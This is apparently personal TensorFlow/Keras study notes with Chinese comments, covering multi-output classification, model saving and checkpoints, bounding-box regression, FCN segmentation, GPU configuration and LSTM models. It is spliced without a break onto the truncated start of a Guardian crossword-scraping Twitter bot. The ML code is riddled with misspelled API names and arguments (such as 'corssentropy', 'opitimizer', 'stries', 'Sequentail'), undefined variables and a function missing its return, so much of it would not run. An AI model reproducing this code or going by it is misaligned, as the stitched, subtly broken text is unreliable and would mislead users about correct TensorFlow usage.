outputs=[out_color,out_item]) #单输入、多输出 model.summary() # model training model.compile(optimizer=keras.optimizers.Adam(lr=0.0005), loss={'out_color':'sparse_categorical_corssentropy', 'out_item':'sparse_categorical_corssentropy'}, metrics=['acc']) train_steps = train_count//BATCH_SIZE test_steps = test_count//BATCH_SIZE history = model.fit(train_data, steps_per_epoch = train_steps, epochs = 15, batch_size = BATCH_SIZE, validation_data = test_data, validation_steps = test_steps) # model evaluation model.evaluate(test_image_array, [test_color_labels, test_item_labels], verbose=0) # model predict my_image = load_preprosess_image(r'{}'.format(random.choice(test_dir))) #my_image = load_preprosess_image(all_image_path[0]) pred = model.predict(np.expend_dims(my_image, axis=0)) #需扩展第一维的Batch_size => (None,224,224,3) # or # pred = model(np.expend_dims(my_image, axis=0), training=False) #直接使用model()调用的方式 pred_color = color_index_to_label.get(np.argmax(pred[0][0])) #预测概率最大的颜色 pred_item = item_index_to_label(np.argmax(pred[1][0])) #预测概率最大的商品 plt.imshow((load_preprosess_image(my_image)+1)/2) plt.xlabel(pred_color + '_' + pred_item) #%% 模型保存与恢复 # 5种:模型整体保存、模型结构保存、模型参数保存、在训练期间保存检查点(使用回调函数)、自定义训练过程中保存检查点 # mnist示例 (train_image, train_label), (test_image, test_label) = tf.keras.datasets.fashion_mnist.load_data() train_image = train_image/255.0 # 0-1值 test_image = test_image/255.0 # 0-1值 print(train_image.shape) # (60000, 28, 28) ds_train_img = tf.data.Dataset.from_tensor_slices(train_image) ds_train_lab = tf.data.Dataset.from_tensor_slices(train_label) ds_train = tf.data.Dataset.zip((ds_train_img, ds_train_lab)) #两个tensor的对应位置元素合并,((28,28),()) ds_test = tf.data.Dataset.from_tensor_slices((test_image, test_label)) #同ds_train生成的效果一样,((28,28),()) ds_train = ds_train.shuffle(10000).repeat().batch(64) ds_test = ds_test.batch(64) # 默认使用了repeat() model = tf.keras.Sequential(tf.keras.layers.Flatten(input_shape=(28, 28)), tf.keras.layers.Dense(128, activation='relu'), tf.keras.layers.Dropout(0.1), tf.keras.layers.Dense(10, activation='softmax')) model.summary() model.compile(opitimizer=tf.keras.optimizer.Adam(lr=0.01), loss='sparse_categorical_corssentropy', # 当label为顺序数字编码时 metrics=['acc']) history = model.fit(ds_train, epochs=5, steps_per_epoch=train_image.shape[0]//64, # "//" used to be int validation_data=ds_test, validation_steps=test_image.shape[0]//64) model.evaluate(test_image, test_label,verbose=0) # 评估 predict = model.predict(test_image) #预测 print(predict[0]) # 返回预测概率 print(np.argmax(predict[0])) # 返回最大概率的位置 print(test_label[0]) # 真实标签 # 1)保存模型整体:包括模型结构、参数、优化器配置的保存,使得模型恢复到与保存时相同的状态 # 1.1)保存模型 model.save('./my_model.h5') #keras使用HDF5格式保存 # 1.2)加载模型 new_model = tf.keras.models.load_model('./my_model.h5') #加载模型 new_model.summary() new_model.evaluate(test_image, test_label,verbose=0) #加载模型评估,与原模型评估结果相同 # 2)模型结构保存 json_config = model.to_json() #获取模型结构 reinitialized_model = tf.keras.model.model_from_json(json_config) #加载模型结构 reinitialized_model.summary() reinitialized_model.evaluate(test_image, test_label,verbose=0) #报错,需要compile之后才可以 reinitialized_model.compile(opitimizer=tf.keras.optimizer.Adam(lr=0.01), loss='sparse_categorical_corssentropy', metrics=['acc']) reinitialized_model.evaluate(test_image, test_label,verbose=0) #正确率较低,由于未经过训练 # 3)模型参数保存 weights = model.get_weights() #获取模型权重 reinitialized_model.set_weights(weights) #加载权重 reinitialized_model.evaluate(test_image, test_label,verbose=0) #正确率较高 model.save_weights('./my_weights.h5') #保存权重到磁盘 reinitialized_model.load_weights('./my_weights.h5') #从磁盘加载权重 reinitialized_model.evaluate(test_image, test_label,verbose=0) #正确率同上 # 备注:2)+3)不等同于1),由于没有保存优化器的配置,而1)保存了优化器配置!!! # 4)在训练期间保存检查点(使用回调函数) # 4.1)保存检查点 checkpoint_path = './my.ckpt' my_callback = tf.keras.callbacks.ModelCheckpoint(filepath=checkpoint_path, moniter='val_loss', save_best_only=False, #True,选择monitor最好的检查点 save_weights_only=True, mode='auto', save_freq='epoch', verbose=0) model = tf.keras.Sequential(tf.keras.layers.Flatten(input_shape=(28, 28)), tf.keras.layers.Dense(128, activation='relu'), tf.keras.layers.Dropout(0.1), tf.keras.layers.Dense(10, activation='softmax')) model.summary() model.compile(opitimizer=tf.keras.optimizer.Adam(lr=0.01), loss='sparse_categorical_corssentropy', # 当label为顺序数字编码时 metrics=['acc']) history = model.fit(ds_train, epochs=5, steps_per_epoch=train_image.shape[0]//64, validation_data=ds_test, validation_steps=test_image.shape[0]//64, callbacks=[my_callback]) # 4.2)加载检查点 model = tf.keras.Sequential(tf.keras.layers.Flatten(input_shape=(28, 28)), tf.keras.layers.Dense(128, activation='relu'), tf.keras.layers.Dropout(0.1), tf.keras.layers.Dense(10, activation='softmax')) model.compile(opitimizer=tf.keras.optimizer.Adam(lr=0.01), loss='sparse_categorical_corssentropy', # 当label为顺序数字编码时 metrics=['acc']) model.evaluate(test_image, test_label,verbose=0) #正确率较低 # 4.2.1)加载检查点中的权重 model.load_weights(checkpoint_path) #加载检查点文件中的权重 model.evaluate(test_image, test_label,verbose=0) #加载后,正确率较高 # 4.2.2)加载检查点中的整个模型(前提回调函数中的save_weights_only=False) model = tf.keras.models.load_model(checkpoint_path) model.evaluate(test_image, test_label,verbose=0) #加载后,正确率较高 # 5)自定义训练过程中保存检查点 model = tf.keras.Sequential(tf.keras.layers.Flatten(input_shape=(28, 28)), tf.keras.layers.Dense(128, activation='relu'), tf.keras.layers.Dropout(0.1), tf.keras.layers.Dense(10, activation='softmax')) optimizer = tf.keras.optimizers.Adam() loss_func = tf.keras.losses.SparseCategorialCrossentropy(from_logits=True) train_loss = tf.keras.metrics.Mean('train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy('train_accuracy') def loss(model, x, y): y_ = model(x) loss = loss_func(y, y_) return loss def train_step(model, images, labels): with tf.GradientTape() as t: predictions = model(images) loss_step = loss_func(labels, predictions) grads = t.gradient(loss_step, model.trainable_variables) #计算loss相对模型变量的梯度 optimizer.apply_gradients(zip(grads, model.trainable_variables)) #使用grads更新模型变量,即优化过程 train_loss(loss_step) #计算平均loss,备注:在循环过程中会记录下每个Batch的loss train_accuracy(labels, predictions) #计算平均accuracy # 5.1)保存检查点 cp_dir = './ckpt_dir/' cp_prefix = os.path.join(cp_dir, 'ckpt') #文件前缀设置为ckpt checkpoint = tf.train.Checkpoint(optimizer=optimizer, model=model) #初始化检查点文件 def train(): for epoch in range(10): for (batch, (images, labels)) in enumerate(ds_train): train_step(model, images, labels) #every batch print('Epoch{} is finished. loss is {}, accuracy is {}.' \ .format(epoch, train_loss.result(), train_accuracy.result())) train_loss.reset_states() train_accuracy.reset_states() checkpoint.save(file_prefix=cp_prefix) #每个epoch保存一次检查点 train() # 5.2)恢复检查点 checkpoint = tf.train.Checkpoint(optimizer=optimizer, model=model) #初始化检查点文件 checkpoint.restore(tf.train.lastest_checkpoint(cp_dir)) #恢复最新的检查点文件 test_pred = tf.argmax(model(test_image, training=False), axis=-1).numpy() print((test_pred == test_label).sum()/len(test_label)) #return acc #%% 图像算法 # 1)图像分类 # 2)图像分类+定位(矩形框标识) # 3)语义分割(semantic segmentation, 区分图像中每个像素点的类别,比如人和狗) # 4)目标检测(object localization, 矩形框标识别所有物体的位置) # 5)实例分割(类似语义分割,但对每个实体都进行区分,比如不同只狗) #%% 图像定位(有监督的回归问题,使用L1/L2损失) # Oxford-IIIT pet dataset:包含37种宠物,每种宠物200张图片左右,及每种宠物的类别、头部轮廓标注、语义分割信息。 import tensorflow as tf import matplotlib.pyplot as plt from matplotlib.patches import Rectangle %matplotlib inline from lxml import etree import numpy as np import glob tf.test.is_gpu_available() # 1)读取图像文件和位置文件 images = glob.glob('./images/*.jpg') xlms = glob.glob('./annotations/xlms/*.xlm') print(len(images)) #7653 print(len(xlms)) #3686 names = [x.split('/')[-1].split('.')[0] for x in xlms] imgs_train = [x for x in images if x.split('/')[-1].split('.')[0] in names] #标记位置的图片 imgs_test = [x for x in images if x.split('/')[-1].split('.')[0] not in names] #未标记位置的图片 imgs_train.sort(key=lambda x: x.split('/')[-1].split('.')[0]) xlms.sort(key=lambda x: x.split('/')[-1].split('.')[0]) print(imgs_train[-5:]) print(xlms[-5:]) # 2)获取label_datasets # xml文件的位置信息提取 def to_labels(path): # xml = open('./annotations/Abyssinian_1.xml').read() xml = open(path).read() sel = etree.HTML(xml) width = int(sel.xpath('//size/width/text()')[0]) height = int(sel.xpath('//size/height/text()')[0]) xmin = int(sel.xpath('//bndbox/xmin/text()')[0]) xmax = int(sel.xpath('//bndbox/xmax/text()')[0]) ymin = int(sel.xpath('//bndbox/ymin/text()')[0]) ymax = int(sel.xpath('//bndbox/ymax/text()')[0]) # 针对缩放的图片,对位置信息进行相应比例的转换 # xmin = (xmin/width)*224 # xmax = (xmax/width)*224 # ymin = (ymin/height)*224 # ymax = (ymax/height)*224 return [xmin/width, xmax/width, ymin/height, ymax/height] labels = [to_labels(path) for path in xlms] out1, out2, out3, out4 = list(zip(*labels)) out1 = np.array(out1) out2 = np.array(out2) out3 = np.array(out3) out4 = np.array(out4) label_datasets = tf.data.Dataset.from_tensor_slice((out1,out2,out3,out4)) # 3)获取image_datasets # 图片解码 def read_ipg(image_path): img = tf.io.read_file(image_path) img = tf.image.decode_jpeg(img, channels=3) return img # 由于图片大小不同,因此需要对图片进行缩放 def normalize(input_image): img = tf.image.resize(input_image, [224,224]) img = img/127.5 -1 #归一化到[-1,1] @tf.function def load_image(path): img = read_ipg(path) # print(img.shape) #(400,600,3) # plt.imshow(img) img = normalize(img) # plt.imshow(img) return img image_paths = tf.data.Dataset.from_tensor_slice(imgs_train) image_datasets = image_paths.map(load_image) BATCH_SIZE = 32 datasets = tf.data.Dataset.zip((image_datasets,label_datasets)) image_count = len(image_count) test_count = int(image_count * 0.2) train_count = image_count - test_count train_datasets = datasets.skip(test_count) test_datasets = datasets.take(test_count) train_datasets = train_datasets.shuffle(train_count).repeat().batch(BATCH_SIZE) test_datasets = test_datasets.batch(BATCH_SIZE) # 4)恢复datasets的图片及位置框 for img, label in train_datasets.take(1): #take one batch plt.imshow(tf.keras.preprocessing.image.array_to_img(img[0])) out1,out2,out3,out4 = label xmin,ymin,xmax,ymax = out1[0].numpy()*224, out2[0].numpy()*224, out3[0].numpy()*224, out4[0].numpy()*224 # 图片上的矩形框绘制 rect = Rectangle((xmin, ymin),(xmax-xmin),(ymax-ymin),fill=False, color='red') #起始点坐标、x轴长度、y轴长度 ax = plt.gca() #获取当前图像 get_current_image ax.axes.add_patch(rect) #当前图像中添加矩形框 plt.show() # 5)构建图像定位的预测模型(回归问题) xception = tf.keras.applications.xception.Xception(include_top=False, weigths='imagenet', input_shape=(224,224,3), pooling='avg') xception.trainable = False xception.summary() inputs = tf.keras.layers.Input(shape=(224,224,3)) x = xception(inputs) x = tf.keras.layers.GlobalAveragePooling2D(x) x = tf.keras.layers.Dense(4096,activation='relu')(x) x = tf.keras.layers.Dense(1000,activation='relu')(x) y1 = tf.keras.layers.Dense(1)(x) y2 = tf.keras.layers.Dense(1)(x) y3 = tf.keras.layers.Dense(1)(x) y4 = tf.keras.layers.Dense(1)(x) model = tf.keras.Model(inputs=inputs, outputs=[y1, y2, y3, y4]) #单输入、多输出 model.compile(optimizer=keras.optimizers.Adam(lr=0.0001), #lr需要较小 loss='mse', metrics=['mae']) EPOCHS = 10 history = model.fit(train_datasets, steps_per_epoch=train_count//BATCH_SIZE, epochs=EPOCHS, validation_data=test_datasets, validation_steps=test_count//BATCH_SIZE) # 6)绘制预测效果 loss = history.history['loss'] val_loss = history.history['val_loss'] epochs = range(EPOCHS) plt.figure() plt.plot(epochs, loss, 'r', label='train-loss') plt.plot(epochs, val_loss, 'b', label='test-loss') plt.title('Train and validation loss') plt.xlabel('Epochs') plt.ylabel('Loss') plt.legend() plt.show() # 7)模型保存与加载 model.save('./image_location_detect_v1.h5') new_model = tf.keras.models.load_model('./image_location_detect_v1.h5') # 8)预测结果验证 plt.figure(figsize=(8,24)) for img, _ in test_datasets.take(1): #take one batch out1,out2,out3,out4 = new_model.predict(img) # 显示3张图片,及预测的矩形框 for i in range(3): plt.subplot(3,1,i+1) plt.imshow(tf.keras.preprocessing.image.array_to_img(img[i])) xmin,ymin,xmax,ymax = out1[i].numpy()*224, out2[i].numpy()*224, out3[i].numpy()*224, out4[i].numpy()*224 # 图片上的矩形框绘制 rect = Rectangle((xmin, ymin),(xmax-xmin),(ymax-ymin),fill=False, color='red') #起始点坐标、x轴长度、y轴长度 ax = plt.gca() #获取当前图像 get_current_image ax.axes.add_patch(rect) #当前图像中添加矩形框 # 9)图像定位的评价指标 # IoU:Intersection over Union(交并比),即预测边框和真实边框的交集和并集的比值。 # 10)优化方向 # 先大后小:先预测出关键点,后在关键点周边预测范围 # 图片划窗:是否有关键点、关键点的位置 # 针对不确定实体个数的预测问题:先检测多个对象,然后在多个对象上回归出位置 # 变回归为分类问题:即定位区域的像素点为1,其余位置为0 #%% 自动图运算(Graph execution) # 使用@tf.function装饰器,实现自动图运算,从而将模型转换为易于部署的tensorflow图模型 # 内部机制: #在eager模型关闭下,函数内代码依次运行,每个tf代码都只定义了计算节点,而非真正的计算 #使用AutoGraph将函数中的python控制流转换成Tensorflow计算图中对应节点,比如while,for转换为tf.while,if转换为tf.cond等 #建立函数内代码计算图,为了保证计算图的顺序,图中还会自动添加一些tf.control_dependencies节点 #运行一次该计算图 #基于函数类型和输入函数参数类型生成一个哈希值,并将建立的计算图缓存到一个哈希表中 #在被@tf.function修饰的函数被再次调用时,根据函数名和输入的函数参数类型计算哈希值,检查哈希表中是否有对应计算图的缓存,如果是则继续使用已缓存的计算图,否则的话根据上述步骤建立计算图。 # 使用方法: #当定义多个函数实现不同运算式时,仅需要在最后调用的函数上添加@tf.function即可,这样所有的运算节点都会被编译。 @tf.function def train_step(model, images, labels): pass #%% GPU的使用和分配 import tensorflow as tf tf.test.is_gpu_available() # 获得当前主机上运算设备列表 gpus = tf.config.experimental.list_physical_devices(device_type='GPU') cpus = tf.config.experimental.list_physical_devices(device_type='CPU') #[PhysicalDevice(name='/physical_device:CPU:0', device_type='CPU')] # 使用既定的运算资源 tf.config.experimental.set_visible_devices(devices=gpus[0:2],device_type='GPU') # 仅在需要时申请显存空间 (动态申请显存空间) for gpu in gpus: tf.config.experimental.set_memory_growth(device_gpu, True) # 设置消耗固定大小的显存 tf.config.experimental.set_virtual_device_configration(gpus[0], [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=1024)]) #%% 图像语义分割 # 目标:预测图像中每个像素的类别(区分背景、边缘、同类实体) # Model-1:FCN (Fully convolutional network),相比较于分类网络,FCN最后不使用全连接层,而使用上采样和跳接结构,还原至原图像大小 # Model-2:Unet,从更少的图像中进行学习, #%% 图像语义分割 - FCN(同图像定位的数据) # 输入:任意尺寸彩色图像 # 输出:与输入尺寸相同 # 通道数:n(目标类别数 + 1(背景) # 1) Upsampling:插值法、反池化、反卷积(转制卷积) # 反卷积: # 通过训练来放大图片 # tf.keras.layers.Conv2DTranspose(filters=32,kernal_size=(3,3),stries=(1,1),padding='same') # 2) 跳接结构 # 用于结合前面的局部特征和后面的全局特征 import tensorflow as tf import matplotlib.pyplot as plt from matplotlib.patches import Rectangle %matplotlib inline from lxml import etree import numpy as np import glob # 1)原图像与语义分割图像处理 images = glob.glob('./images/*.jpg') anno = glob.glob('./annotations/trimaps/*.png') # shuffle np.random.seed(2) index = np.random.permutation(len(images)) images = np.array(images)[index] anno = np.array(anno)[index] dataset = tf.data.Dataset.from_tensor_slices((images, anno)) # 原图像解码 def read_jpg(path): # img = tf.io.read_file('./images/yorkshire_terrier_99.jpg') img = tf.io.read_file(path) img = tf.image.decode_jpeg(img, channels=3) # plt.imshow(img) return img # 语义图像解码 def read_png(path): # img = tf.io.read_file('./images/yorkshire_terrier_99.jpg') img = tf.io.read_file(path) img = tf.image.decode_png(img, channels=1) # print(img.shape) #(358,500,1) # img = tf.squeeze(img) # print(img.shape) #(358,500) # plt.imshow(img) # print(np.unique(img.numpy())) #array([1,2,3]) return img # 图片大小 def resize_img(images): images = tf.image.resize(images, [224,224]) return images # 归一化 def normal_img(input_images, input_anno): input_images = tf.cast(input_images, tf.float32) input_images = input_images/127.5 - 1 #[-1,1] input_anno = input_anno -1 #[0,1,2] return input_images, input_anno def load_images(input_images_path, input_anno_path): input_images = read_jpg(input_images_path) input_anno = read_png(input_anno_path) input_images = resize_img(input_images) input_images = resize_img(input_anno) return normal_img(input_images, input_anno) BATCH_SIZE = 32 AUTOTUNE = tf.data.experimental.AUTOTUNE #根据CPU数目,自动使用并行运算 dataset = dataset.map(load_images, num_parallel_calls=AUTOTUNE) test_count = len(images) * 0.2 train_count = len(images) - test_count data_train = dataset.skip(test_count) data_train = data_train.shuffle(100).repeat().batch(BATCH_SIZE) data_train = data_train.prefetch(AUTOTUNE) print(data_train.shape) #((None,224,224,3), (None,224,224,1)) data_test= dataset.take(test_count) data_test = data_test.batch(BATCH_SIZE) data_test = data_test.prefetch(AUTOTUNE) # 同时显示原图像和语义分割图像 for img, anno in data_train.take(1): plt.subplot(2,1,1) plt.imshow(tf.keras.preprocessing.image.array_to_img(img[0])) plt.subplot(2,1,2) plt.imshow(tf.keras.preprocessing.image.array_to_img(anno[0])) # 2)预训练模型构建 conv_base = tf.keras.applications.VGG16(include_top=False, weigths='imagenet', input_shape=(256,256,3)) conv_base.summary() # 最后一层(7,7,512)=>上采样为(14,14,512)=>与上层输出相加(14,14,512)=>再上采样为(28,28,256)=>与上层输出相加(28,28,256)=> ...=> 最终输出(224,224,1) # 3)获得模型中间层的输出 # 如何获取网络中某层的输出? conv_base.get_layer('block5_conv3').output # 如何获取子模型? (子模型继承了原模型的权重) sub_model = tf.keras.models.Model(inputs=conv_base.input, output=conv_base.get_layer('block5_conv3').output) sub_model.summary() # 获取预训练模型的多个中间层的输出 layer_names = ['block5_conv3', 'block4_conv3', 'block3_conv3', 'block5_pool'] #要获取的中间层名称 layers_output = [conv_base.get_layer(layer_name).output for layer_name in layer_names] multi_out_model = tf.keras.models.Model(inputs=conv_base.input, output=layers_output) print(multi_out_model.predict(image)) #分别返回4个子模型的预测输出结果 multi_out_model.trainable = False # 4)FCN模型构建 inputs = tf.keras.layers.Input(shape=(224,224,3)) out_block5_conv3, out_block4_conv3, out_block3_conv3, out = multi_out_model(inputs) print(out.shape) #(None,7,7,512) print(out_block5_conv3.shape) #(None,14,14,512) print(out_block4_conv3.shape) #(None,28,28,512) print(out_block3_conv3.shape) #(None,56,56,256) # a) 针对out进行upsampling x1 = tf.keras.layers.Conv2DTranspose(filters=512, kernal_size=(3,3), stries=2, #变为原来的2倍大小 padding='same', activation='relu')(out) #(None,14,14,512) # 增加一层卷积,增加特征提取程度 x1 = tf.keras.layers.Conv2D(filters=512, kernal_size=(3,3), padding='same', activation='relu')(x1) #(None,14,14,512) # 与上层进行相加 x2 = tf.add(x1, out_block5_conv3) #(None,14,14,512) # b) 针对x2进行upsampling x2 = tf.keras.layers.Conv2DTranspose(filters=512, kernal_size=(3,3), stries=2, #变为原来的2倍大小 padding='same', activation='relu')(x2) #(None,28,28,512) # 增加一层卷积,增加特征提取程度 x2 = tf.keras.layers.Conv2D(filters=512, kernal_size=(3,3), padding='same', activation='relu')(x2) #(None,28,28,512) # 与上层进行相加 x3 = tf.add(x2, out_block4_conv3) #(None,28,28,512) # c) 针对x2进行upsampling x3 = tf.keras.layers.Conv2DTranspose(filters=256, kernal_size=(3,3), stries=2, #变为原来的2倍大小 padding='same', activation='relu')(x3) #(None,56,56,256) # 增加一层卷积,增加特征提取程度 x3 = tf.keras.layers.Conv2D(filters=256, kernal_size=(3,3), padding='same', activation='relu')(x3) #(None,56,56,256) # 与上层进行相加 x4 = tf.add(x3, out_block3_conv3) #(None,56,56,256) # d) 针对x4进行upsampling x5 = tf.keras.layers.Conv2DTranspose(filters=64, kernal_size=(3,3), stries=2, #变为原来的2倍大小 padding='same', activation='relu')(x4) #(None,112,112,64) # 增加一层卷积,增加特征提取程度 x5 = tf.keras.layers.Conv2D(filters=64, kernal_size=(3,3), padding='same', activation='relu')(x5) #(None,112,112,64) # d) 针对x5进行upsampling prediction = tf.keras.layers.Conv2DTranspose(filters=3, kernal_size=(3,3), stries=2, #变为原来的2倍大小 padding='same', activation='softmax')(x5) #(None,224,224,3) # 最终创建模型 model = tf.keras.models.Model(inputs=inputs, outputs=prediction) model.summary() # 5)FCN模型训练 model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['acc']) history = model.fit(data_train, epochs=5, steps_per_epoch=train_count//BATCH_SIZE, validation_data=data_test, validation_steps=test_count//BATCH_SIZE) loss = history.history['loss'] val_loss = history.history['val_loss'] epochs = range(EPOCHS) plt.figure() plt.plot(epochs, loss, 'r', label='train-loss') plt.plot(epochs, val_loss, 'b', label='test-loss') plt.title('Train and validation loss') plt.xlabel('Epochs') plt.ylabel('Loss') plt.ylim([0,1]) plt.legend() plt.show() # 6) 模型预测 for img, mask in data_test.take(1): #take one batch pred = model.predict(img) pred = tf.argmax(pred, axis=-1) pred = pred[..., tf.newaxis] #扩展维度 (None,224,224,1) plt.figure(figsize=(10,10)) num = 5 for i in range(num): plt.subplot(num, 3, i*3+1) plt.imshow(tf.keras.preprocessing.image.array_to_img(img[i])) #原图 plt.subplot(num, 3, i*3+2) plt.imshow(tf.keras.preprocessing.image.array_to_img(mask[i])) #语义分割图 plt.subplot(num, 3, i*3+3) plt.imshow(tf.keras.preprocessing.image.array_to_img(pred[i])) #预测的语义分割图 #%% RNN # tf.keras.layers.LSTM # tf.keras.layers.GRU # input_shape is (batch_size, seq_length, embedding_size) # output_shape is (batch_size, tags) import tensorflow as tf import matplotlib.pyplot as plt from matplotlib.patches import Rectangle %matplotlib inline import numpy as np import re # 数据集:航空公司评论数据集 data = pd.read_csv('./Tweet.csv') #including text and label data = data[['airline_sentiment','text']] print(data.airline_sentiment.unique()) #标签种类 print(data.airline_sentiment.value_count()) #样本分布 data_p = data[data.airline_sentiment=='positive'] data_n = data[data.airline_sentiment=='negative'] data_n = data_n.iloc[:data_p.shape[0]] data = pd.concat([data_p,data_n]) data = data.sample(len(data)) data['label'] = (data.airline_sentiment == 'positive').astype(int) del data['airline_sentiment'] # 文本清洗 def reg_text(text): token = re.compile('[A-Za-z]+|[!?,.()]') new_text = token.findall(text) new_text = [word.lower() for word in new_text] return new_text data['text'] = data['text'].apply(reg_text) # 文本转ID word_set = list(set([word for word in text for text in data['text'].tolist()])) word_index = {} for index, word in enumerate(word_set): word_index[word] = index + 1 #由于使用0进行填充,因此index从1开始 data_ok = data['text'].apply(lambda x: [word_index.get(word,0) for word in x]) # 文本长度分析 text_len = data_ok.apply(lambda x : len(x)) print(text_len.describe()) max_len = max(text_len) #40 max_word = len(word_set) + 1 #1为填充 data_ok = tf.keras.preprocessing.sequence.pad_sequences(data_ok.values, max_len) #填充0,使得长度为max_len # LSTM模型构建 model = tf.keras.models.Sequential() model.add(tf.keras.layers.Embedding(max_word, 50, input_length=max_len)) #向量化,input_length输入数据的长度, (None, max_len, 50) model.add(tf.keras.layers.LSTM(64)) #model.add(tf.keras.layers.Dense(128, activation='relu', kernel_regularizer=keras.regularizers.l2(0.01))) #添加L2正则化 model.add(tf.keras.layers.Dense(1, activation='sigmoid')) model.summary() model.compile(optimizer=tf.keras.optimizers.Adam(lr=0.01), loss='binary_crossentropy', metrics=['acc']) model.fit(data_ok, data.labels.values, epochs=10, batch_size=32, validation_split=0.2) #选择20%作为测试集 #%% RNN - 北京空气污染预测 # 目标:预测未来的PM2.5水平 import tensorflow as tf import matplotlib.pyplot as plt from matplotlib.patches import Rectangle %matplotlib inline import numpy as np import pandas as pd import re import datetime # 1)数据处理 data = pd.read_csv('./dataset/PRSA_data.csv') #label is PM2.5 # Nan数据处理 data['pm2.5'].isna().sum() #2067, 由于去掉PM2.5为空的序列会打乱数据的时序性,因此采取填充的方式 data = data.iloc[24:] #去掉前24个pm2.5为空的数据 data = data.fillna(method='ffill') #前向填充,使用前天的数据填充昨天的数据 # 时间列合并成一个索引值 data['tm'] = data.apply(lambda x: datetime.datetime(year=x['year'], month=x['month'], day=x['day'], hour=x['hour']), axis=1) data.drop(columns=['year','month','day','hour','No'], inplace=True) data = data.set_index('tm') # 非数字列处理 print(data.cbwd.unique()) data = data.join(pd.get_dummies(data.cbwd)) #cbwd列进行onehot编码后,与原dataframe进行拼接 del data.cbwd # 数据时序性采样 # 使用前面多久的时序数据,来预测接下来多久的数据? data['pm2.5'][-1000:].plot() # 最后1000次PM2.5观测情况 seq_length = 5 * 24 #使用当前点前5天的数据 delay = 24 #预测当前点后1天的数据,因此delay=24h data_ = [] for i in range(len(data) - seq_length - delay): data_.append(data.iloc[i: i + seq_length + delay]) #按时序依次采样6天的数据 data_ = np.array([df.values for df in data_]) #转化成numpy形式 print(data_.shape) #(43656,144,11),一共采样出43656条时序数据,每条时序包括144个时间点,每个时间点包含11个特征值 # 训练和测试数据生成 np.random.shuffle(data_) x = data_[:,:seq_length,:] #(43656,120,11) y = data_[:,-1,0] #(43656,),-1 => 取每条时序的最后一个时间点,0 => 最后一个时间点的pm2.5值 split_b = int(0.8 * data_.shape[0]) train_x = x[:split_b] train_y = y[:split_b] test_x = x[split_b:] test_y = y[split_b:] # 数据标准化 # 注意:a. 训练集需要单独进行标准化,不能使用全局数据的标准化结果 # b. 测试集也应该使用训练集的均值和标准差进行标准化 # c. 预测值是否需要进行标准化呢?不需要 mean = train_x.mean(axis=0) #按列计算均值 std = train_x.std(axis=0) #按列计算标准差 train_x = (train_x - mean)/std test_x = (test_x - mean)/std # 2)构建全连接神经网络 BATCH_SIZE = 32 model = tf.keras.Sequentail() model.add(tf.keras.Flatten(input_shape=train_x.shape[1:])) model.add(tf.keras.Dense(32,activation='relu')) model.add(tf.keras.Dense(1)) #回归问题,无需激活函数 model.compile(optimizer='adam', loss='mse', metrics=['mae']) history = model.fit(train_x,train_y, epochs=50, steps_per_epoch=split_b//BATCH_SIZE, validation_data=(test_x,test_y), validation_steps=(data_.shape[0]-split_b)//BATCH_SIZE) plt.plot(history.epoch, history.history['mean_absolute_error'], 'r', label='train-loss') plt.plot(history.epoch, history.history['val_mean_absolute_error'], 'g', label='validation-loss') plt.legend() # 3)构建单层LSTM网络 model = tf.keras.Sequentail() model.add(tf.keras.layers.LSTM(units=32, input_shape=train_x.shape[1:], activation='tanh')) #默认return_sequences=False, 即只返回LSTM的output结果,而非state结果 model.add(tf.keras.Dense(1)) model.compile(optimizer='adam', loss='mse', metrics=['mae']) history = model.fit(train_x,train_y, epochs=150, steps_per_epoch=split_b//BATCH_SIZE, validation_data=(test_x,test_y), validation_steps=(data_.shape[0]-split_b)//BATCH_SIZE) plt.plot(history.epoch, history.history['mean_absolute_error'], 'r', label='train-loss') plt.plot(history.epoch, history.history['val_mean_absolute_error'], 'g', label='validation-loss') plt.legend() # 4)构建多层LSTM网络 model = tf.keras.Sequentail() model.add(tf.keras.layers.LSTM(units=32, input_shape=train_x.shape[1:], activation='tanh', return_sequences=True)) #返回LSTM的output和state结果 model.add(tf.keras.layers.LSTM(units=32, activation='tanh', return_sequences=True)) model.add(tf.keras.layers.LSTM(units=32, activation='tanh', return_sequences=False)) #最后一个LSTM,只使用output输出,用于连接Dense层 model.add(tf.keras.Dense(1)) # 添加回调函数,在训练过程中降低学习速率 #在连续3个epoch中val_loss没有降低,则降低LR为原来的0.1倍,但最小不超过0.00001 lr_reduce = tf.keras.callbacks.ReduceLROnPlateau(monitor='val_loss', patience=3, factor=0.1, min_lr=0.00001) model.compile(optimizer='adam', loss='mse', metrics=['mae']) history = model.fit(train_x,train_y, epochs=200, steps_per_epoch=split_b//BATCH_SIZE, validation_data=(test_x,test_y), validation_steps=(data_.shape[0]-split_b)//BATCH_SIZE, callbacks=[lr_reduce]) plt.plot(history.epoch, history.history['mean_absolute_error'], 'r', label='train-loss') plt.plot(history.epoch, history.history['val_mean_absolute_error'], 'g', label='validation-loss') plt.legend()
import pickle from collections import namedtuple, defaultdict from random import choice import requests from bs4 import BeautifulSoup import markovify from twython import Twython Clue = namedtuple('Clue', 'setter xword_id clue_number raw_clue words pattern') Setter = namedtuple('Setter', 'name clues markov') credentials = {'app_key': 'your', 'app_secret': 'details', 'oauth_token': 'go', 'oauth_token_secret': 'here'} twitter_handles = {'Qaos': '@qaos_xword', 'Boatman': '@BoatmanCryptics', 'Hectence': '@Hectence', 'Navy': '@navy_clues', 'Paul': '@crosswordpaul', 'Tramp': '@Tramp_crossword', 'Enigmatist': '@enigmatistelgar'} def get_crossword_id(): url = 'https://www.theguardian.com/crosswords/series/cryptic' p = requests.get(url) soup = BeautifulSoup(p.content, 'html.parser') return int(soup.find(class_='fc-item')['data-id'].split('/')[-1]) def scrape_clues(crossword_id): base = 'https://www.theguardian.com/crosswords/cryptic/' p = requests.get(base + str(crossword_id)) soup = BeautifulSoup(p.content, 'html.parser') setter = soup.find(class_='byline').find('a').text clues = soup.find(class_='crossword__clues') todays_clues = [] for clue in clues.findAll('li'): clue_number, raw_clue = (c.text for c in clue.findAll('div')) *words, pattern = raw_clue.split() for i, word in enumerate(words): # Strip the punctuation words[i] = ''.join([char for char in word if char.isalpha() or char == '-']) words = [w for w in words if w and w != '-'] todays_clues.append(Clue(setter, crossword_id, clue_number, raw_clue, words, pattern)) return todays_clues def make_tweet(setter, crossword_id, clue): url = 'https://www.theguardian.com/crosswords/cryptic/' + str(crossword_id) if setter in twitter_handles.keys(): setter = twitter_handles[setter] openings = [f"Today's @guardian crytpic crossword set 